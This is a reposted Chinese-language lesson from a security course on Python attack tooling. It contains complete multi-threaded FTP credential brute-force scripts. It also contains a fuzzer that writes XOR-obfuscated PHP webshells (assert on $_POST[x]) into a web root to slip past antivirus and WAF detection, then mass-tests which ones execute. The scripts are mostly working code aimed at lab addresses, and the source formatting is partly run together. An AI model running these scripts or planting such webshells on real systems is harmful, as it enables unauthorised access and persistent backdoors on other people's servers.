78:Python開發-多執行緒Fuzz&Waf異或免殺&爆破
阿新 • • 發佈:2021-08-19
本課知識點:
- 協議模組使用,Request爬蟲技術,簡易多執行緒技術,編碼技術,Bypass後門技術
- 掌握利用強大的模組實現各種協議連線操作(爆破或利用等),配合Fuzz吊打WAF等
- queue,threading模組使用
案例2:利用FTP模組實現協議爆破指令碼
- 1.ftplib模組使用
- 2.遍歷使用者及密碼字典
- 3.嘗試連線執行命令判斷
# Author:Serena import ftplib #簡單的模擬登入測試 #爆破:IP、埠、使用者名稱、密碼字典 def ftp_brute(): ftp = ftplib.FTP()ftp_brute_單執行緒for username in open('ftp-user.txt'): for password in open('ftp-pwd.txt'): username = username.replace('\n','') password = password.replace('\n','') # print(username+'|'+password) try: ftp.connect('192.168.56.110', 21) ftp.login(username,password)print(username+'|'+password+'| ok') list = ftp.retrlines('list') #此時可以獲得當前ftp目錄下的所有檔案的資訊 print(list) except ftplib.all_errors: pass if __name__ == '__main__': ftp_brute()
# Author:Serena import ftplib,sys,queue,threadingftp_brute_多執行緒#簡單的模擬登入測試 #爆破:IP、埠、使用者名稱、密碼字典 import queue import threading def ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,port) while not q.empty(): dict = q.get() dict = dict.split('|') username = dict[0] password = dict[1] try: ftp.login(username,password) print(username+'|'+password+'| ok') list = ftp.retrlines('list') #此時可以獲得當前ftp目錄下的所有檔案的資訊 print(list) except ftplib.all_errors: print(username + '|' + password + '| no') pass if __name__ == '__main__': ip = sys.argv[1] port = int(sys.argv[2]) userfile = sys.argv[3] passfile = sys.argv[4] threading_num = int(sys.argv[5]) q = queue.Queue() for username in open(userfile): for password in open(passfile): username = username.replace('\n','') password = password.replace('\n','') # print(username+'|'+password) q.put(username + '|' + password) for x in range(threading_num): t = threading.Thread(target=ftp_brute,args=(ip,port)) t.start() # 命令列執行:python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10 # 可以再優化一下:檢測到爭取的使用者名稱密碼後停止
案例3:配合Fuzz實現免殺異或shell指令碼
- 1.免殺異或shell原理講解及開發思路(參考及舉例:!^@,"^?等)
- 2.基於Fuzz思路生成大量Payload程式碼並有序命名寫入網站檔案中
- 3.基於多執行緒實現批量訪問shell檔案並提交測試是否正常連接回顯
# Author:Serena import time import requests import threading,queue def bypass_check(): while not q.empty(): filename = q.get() url = "http://127.0.0.1:8081/x/" + filename datas = { 'x ': 'phpinfo();' } result = requests.post(url, data=datas).content.decode('utf-8') if "XIAODI-PC" in result: print('check ->' + filename+'->ok') else: print('check ->' + filename + '->no') time.sleep(1) if __name__ == '__main__': q = queue.Queue() for i in range(1,127): for ii in range(1, 127): payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'" code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>" filename = str(i) + 'xd' + str(ii) + '.php' q.put(filename) with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f: f.write(code) print("Fuzz檔案生成成功") for x in range(20): t = threading.Thread(target=bypass_check) t.start()Bypass
涉及資源:
- fuzzdb(https://github.com/zhanye/fuzzdb)
- fuzzDicts(https://github.com/stemmm/fuzzDicts)
- Webshell免殺繞過waf(https://www.cnblogs.com/liujizhou/p/11806497.html)
- python ftplib模組(https://www.cnblogs.com/kaituorensheng/p/4480512.html)
- PHP異或(https://blog.csdn.net/qq_41617034/article/details/104441032)
- https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ,提取碼:xiao